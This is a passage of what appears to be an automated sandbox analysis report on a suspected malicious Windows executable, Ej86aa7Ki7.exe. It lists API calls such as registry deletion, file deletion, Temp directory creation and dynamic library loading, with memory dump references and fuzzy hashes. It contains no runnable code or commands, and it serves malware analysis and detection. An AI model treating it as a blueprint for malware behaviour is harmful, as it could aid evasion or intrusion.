        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 5ce5b5824dab04b0af399fdb569f5160cdf810ce4d6e1efcb4a21919472af673
        • Instruction ID: 57281eb70c6d5ee4f1dcb93120720bdacd8771e53a80a41a257af2ecf5b7c0f8
        • Opcode Fuzzy Hash: 5ce5b5824dab04b0af399fdb569f5160cdf810ce4d6e1efcb4a21919472af673
        • Instruction Fuzzy Hash: 7C714431D04229DBEF28CF98C844BADBBB1FF44305F11806AD856BB291C7789A96DF44
        APIs
        • GetTickCount.KERNEL32 ref: 00403297
          • Part of subcall function 00403402: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403100,?), ref: 00403410
        • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004031AD,00000004,00000000,00000000,?,?,00403127,000000FF,00000000,00000000,0040A230,?), ref: 004032CA
        • SetFilePointer.KERNELBASE(00D05A7D,00000000,00000000,00414ED0,00004000,?,00000000,004031AD,00000004,00000000,00000000,?,?,00403127,000000FF,00000000), ref: 004033C5
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: FilePointer$CountTick
        • String ID:
        • API String ID: 1092082344-0
        • Opcode ID: 7f87ec3f3126c4afc5deb31522855fdbb853a78037bb661dde8e94ffc6001a55
        • Instruction ID: 6f8adcdc05782984f9803186be869087625e4848c31a04748361169110b3332d
        • Opcode Fuzzy Hash: 7f87ec3f3126c4afc5deb31522855fdbb853a78037bb661dde8e94ffc6001a55
        • Instruction Fuzzy Hash: 66314A72614205DBD7109F29FEC49663BA9F74039A714423FE900F22E0DBB9AD018B9D
        APIs
          • Part of subcall function 00402D5D: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402D85
        • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402544
        • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 00402557
        • RegCloseKey.ADVAPI32(?,?,?,0040B5D8,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040256D
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: Enum$CloseOpenValue
        • String ID:
        • API String ID: 167947723-0
        • Opcode ID: d2a030f519bef57aeb41d3aabfee9c269b42944cadf78794d8793362519e5dac
        • Instruction ID: bf3b2bcb6287721b49d379c1e5eb9bed13c1d22dc32754f1d9800637ac4e69b6
        • Opcode Fuzzy Hash: d2a030f519bef57aeb41d3aabfee9c269b42944cadf78794d8793362519e5dac
        • Instruction Fuzzy Hash: 44018F71A04204ABE7109FA59E8CABF766CEF40388F10443EF506A61D0EAF84E419629
        APIs
        • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,004281E0,?,00406352,80000002,Software\Microsoft\Windows\CurrentVersion,?,004281E0,?), ref: 00406109
        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00406352,80000002,Software\Microsoft\Windows\CurrentVersion,?,004281E0,?), ref: 0040612A
        • RegCloseKey.ADVAPI32(?,?,00406352,80000002,Software\Microsoft\Windows\CurrentVersion,?,004281E0,?), ref: 0040614D
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: CloseOpenQueryValue
        • String ID:
        • API String ID: 3677997916-0
        • Opcode ID: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
        • Instruction ID: 5a49725d9b8b462efd799bce316dcbaad7059079bb26d9a6c1e38be835131f9e
        • Opcode Fuzzy Hash: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
        • Instruction Fuzzy Hash: 2F015A3110020AEACF218F26ED08EDB3BA9EF88391F01403AFD55D6220D774D964CBA5
        APIs
          • Part of subcall function 00405DC2: GetFileAttributesW.KERNELBASE(?,?,004059C7,?,?,00000000,00405B9D,?,?,?,?), ref: 00405DC7
          • Part of subcall function 00405DC2: SetFileAttributesW.KERNELBASE(?,00000000), ref: 00405DDB
        • RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405B9D), ref: 004059D6
        • DeleteFileW.KERNEL32(?,?,?,00000000,00405B9D), ref: 004059DE
        • SetFileAttributesW.KERNEL32(?,00000000), ref: 004059F6
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: File$Attributes$DeleteDirectoryRemove
        • String ID:
        • API String ID: 1655745494-0
        • Opcode ID: 4d7e10e481d95c5c5c7c05f6c7e2fdde8e74fc3924f4c20308c7a9621a850695
        • Instruction ID: bc22120fb0abf4725c7bfcc2d312b2669146bcdc80e6b93b711a22507a8c90f5
        • Opcode Fuzzy Hash: 4d7e10e481d95c5c5c7c05f6c7e2fdde8e74fc3924f4c20308c7a9621a850695
        • Instruction Fuzzy Hash: 29E06572219A9196C2106735590CB5F2998DF86734F054A3BF591B11D0DB7888068A7D
        APIs
        • SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,00403127,000000FF,00000000,00000000,0040A230,?), ref: 004031A0
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: FilePointer
        • String ID:
        • API String ID: 973152223-0
        • Opcode ID: 1aa85c7260de761b297061d79344dc340e95e4778a17b24641d9514d9a29d692
        • Instruction ID: 40ace49db037ace229a3e5c96781d28ed7fa856bf3440834985399bb1b02b3fc
        • Opcode Fuzzy Hash: 1aa85c7260de761b297061d79344dc340e95e4778a17b24641d9514d9a29d692
        • Instruction Fuzzy Hash: 65316B30601219EBDF10DFA5ED84ADA3E68FF04799F20417EF905E6190D7788E509BA9
        APIs
        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
        • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: MessageSend
        • String ID:
        • API String ID: 3850602802-0
        • Opcode ID: 3ee467f7d586eb782eae2bae36c3decf9d7e0780ea8b642ce91f4ebf2c7a7eb5
        • Instruction ID: d65e0694727b7210e6f7bc09f77efd2c0147e56cffd904cd4a2c980f2ed28b93
        • Opcode Fuzzy Hash: 3ee467f7d586eb782eae2bae36c3decf9d7e0780ea8b642ce91f4ebf2c7a7eb5
        • Instruction Fuzzy Hash: 3D01D131724210EBEB195B789D04B2A3698E714314F1089BAF855F62F1DA788C128B5D
        APIs
          • Part of subcall function 00402D5D: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402D85
        • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023AD
        • RegCloseKey.ADVAPI32(00000000), ref: 004023B6
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: CloseDeleteOpenValue
        • String ID:
        • API String ID: 849931509-0
        • Opcode ID: e6a42a97a56624194c1f16ef160d96f75f01f2dbcd79b4c5bc821ba537a64a6e
        • Instruction ID: c0d23e370c25ffca0c370365ac79ff448217ed3cb42859f8984a45efd79f81dd
        • Opcode Fuzzy Hash: e6a42a97a56624194c1f16ef160d96f75f01f2dbcd79b4c5bc821ba537a64a6e
        • Instruction Fuzzy Hash: A8F0C233A04111ABEB10BBB49B8EAAE72699F40348F11447FF602B71C0C9FC4D428669
        APIs
        • OleInitialize.OLE32(00000000), ref: 00405454
          • Part of subcall function 00404322: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404334
        • CoUninitialize.COMBASE(00000404,00000000), ref: 004054A0
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: InitializeMessageSendUninitialize
        • String ID:
        • API String ID: 2896919175-0
        • Opcode ID: 3868b5a52622b10a1177551b7cc78a5ffd836502efb30cae45cbc154cdcfe80d
        • Instruction ID: 97e24603e1a40a48e39ce2db5dd5886101c9f28e99c3f4bcfc8565b2c6c37521
        • Opcode Fuzzy Hash: 3868b5a52622b10a1177551b7cc78a5ffd836502efb30cae45cbc154cdcfe80d
        • Instruction Fuzzy Hash: 3DF0F076600601CBD31057549E02BAB72A4EFC0306F46407EEE44A23B1D67A48928A6E
        APIs
        • GetModuleHandleA.KERNEL32(?,00000020,?,004034B3,00000009), ref: 004065FE
        • GetProcAddress.KERNEL32(00000000,?), ref: 00406619
          • Part of subcall function 0040657C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406593
          • Part of subcall function 0040657C: wsprintfW.USER32 ref: 004065CE
          • Part of subcall function 0040657C: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004065E2
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
        • String ID:
        • API String ID: 2547128583-0
        • Opcode ID: 31197a09b32f9822319ed056a1c078f96e3f7aaf520cdba8edd4f010bc886546
        • Instruction ID: aacf951b1eba8b902ff867273acd7254ef5911eae3d9513ed99e50af610fe84a
        • Opcode Fuzzy Hash: 31197a09b32f9822319ed056a1c078f96e3f7aaf520cdba8edd4f010bc886546
        • Instruction Fuzzy Hash: 44E026326046206BC31047705E0893762AC9FC83003020C3EF502F2044CB789C329EAD
        APIs
        • GetFileAttributesW.KERNELBASE(00000003,00402F18,C:\Users\user\Desktop\Ej86aa7Ki7.exe,80000000,00000003), ref: 00405DEB
        • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E0D
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: File$AttributesCreate
        • String ID:
        • API String ID: 415043291-0
        • Opcode ID: 7f22f31ca84e25cf3c35cca7fc28e1469c604482c982d9b12555b4894eb7b1e0
        • Instruction ID: e98dd403a5e5432679a9d4e257ef455d3d6759c2e5ed6cf280caa05d5291d686
        • Opcode Fuzzy Hash: 7f22f31ca84e25cf3c35cca7fc28e1469c604482c982d9b12555b4894eb7b1e0
        • Instruction Fuzzy Hash: B3D09E71654601EFEF098F20DF16F2E7AA2EB84B00F11562CB682940E0DA7158199B19
        APIs
        • GetFileAttributesW.KERNELBASE(?,?,004059C7,?,?,00000000,00405B9D,?,?,?,?), ref: 00405DC7
        • SetFileAttributesW.KERNELBASE(?,00000000), ref: 00405DDB
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: AttributesFile
        • String ID:
        • API String ID: 3188754299-0
        • Opcode ID: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
        • Instruction ID: 952e92710cc69b9b43d0c132b1ebcdc485dc7d738455aa6d22c0503b32111fdc
        • Opcode Fuzzy Hash: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
        • Instruction Fuzzy Hash: 9DD0C972504520ABC2112728AE0C89BBB55EB542717028B35FAA9A22B0CB304C568A98
        APIs
        • CreateDirectoryW.KERNELBASE(?,00000000,0040343D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 004058C3
        • GetLastError.KERNEL32 ref: 004058D1
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: CreateDirectoryErrorLast
        • String ID:
        • API String ID: 1375471231-0
        • Opcode ID: 90cc4c9737d43430731b600de694bcf2d45feac9894761d90dfe22e9228b7257
        • Instruction ID: 9103f4137618f2f7179a3cd735c3beaeb677db9e9f97e60de6da32ac40298118
        • Opcode Fuzzy Hash: 90cc4c9737d43430731b600de694bcf2d45feac9894761d90dfe22e9228b7257
        • Instruction Fuzzy Hash: 42C04C31204A019BD6506B209F08B177A94EF50742F21C4396646F00A0DA348425DF3D
        APIs
        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 00402343
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: PrivateProfileStringWrite
        • String ID:
        • API String ID: 390214022-0
        • Opcode ID: 196762a6526ae89b3abf44263c4053b82e560c8490a900e61fc9f6afa6b6512d
        • Instruction ID: 442d6135041436e14d88d5d309934ead45877352a2168de0e76fd2d1165917bb
        • Opcode Fuzzy Hash: 196762a6526ae89b3abf44263c4053b82e560c8490a900e61fc9f6afa6b6512d
        • Instruction Fuzzy Hash: 3FE086319085B66BE71036F10F8DABF10589B44385B14057FB612B71C3D9FC4D8242AD
        APIs
        • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402D85
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
